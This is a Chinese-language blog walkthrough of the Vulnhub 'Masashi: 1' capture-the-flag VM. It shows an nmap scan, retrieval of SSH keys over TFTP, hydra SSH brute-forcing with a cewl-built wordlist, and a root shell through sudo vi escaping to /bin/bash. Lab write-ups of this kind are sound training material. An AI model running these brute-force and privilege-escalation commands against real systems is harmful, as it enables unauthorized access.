当前位置: 首页 > news >正文

Vulnhub: Masashi: 1靶机

news 2025/8/19 4:12:28

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

在这里插入图片描述

查看80端口的robots.txt提示三个文件

在这里插入图片描述

snmpwalk.txt内容,tftp服务在1337端口

在这里插入图片描述

sshfolder.txt内容,提示用户名sv5

在这里插入图片描述

tftp连接目标下载id_rsaid_rsa.pub

tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

在这里插入图片描述

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

在这里插入图片描述

提权

sv5用户sudo权限

在这里插入图片描述

提升为root

sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

在这里插入图片描述

在这里插入图片描述

flag

在这里插入图片描述

http://www.lryc.cn/news/158918.html

相关文章:

  • 校园二手物品交易系统微信小程序设计
  • Pixillion Pro for Mac:将您的图像转换为艺术佳作
  • 【上海迪士尼度假区】技术解决方案
  • 每日刷题-2
  • AOSP内置搜狗输入并设置默认输入法
  • ICCV 2023|通过慢学习和分类器对齐在预训练模型上进行持续学习
  • 蓝桥杯打卡Day5
  • QT for andriod
  • 【广州华锐互动】AR技术在配电系统运维中的应用
  • TiDB 一栈式综合交易查询解决方案获“金鼎奖”优秀金融科技解决方案奖
  • 《网络是怎样连接的》(六)
  • 2023年高教社杯数学建模国赛 赛题浅析
  • 使用QT操作Excel 表格的常用方法
  • vue前后端端口不一致解决方案
  • springcloudSeata处理分布式事务之1.7.0
  • 每日刷题|回溯法解决全排列问题
  • 10-JVM调优工具详解
  • 东方博易oj——3119 - 约瑟夫问题2(链表)
  • C++,day0907
  • 孤儿僵尸守护进程的简单理解
  • 学习笔记——Java入门第一季
  • 更改注册表exe值后的惨痛经历
  • stable diffusion实践操作-LyCORIS
  • 无需公网IP教你如何外网远程访问管家婆ERP进销存
  • Swift使用编解码库Codable
  • Vue + Element UI 前端篇(三):工具模块封装
  • 【pytorch】数据加载dataset和dataloader的使用
  • 搭建单机版FastDFS分布式文件存储系统
  • 【验证码逆向专栏】房某下登录滑块逆向分析
  • Python 3.11 版本是对线程安全做了什么更改吗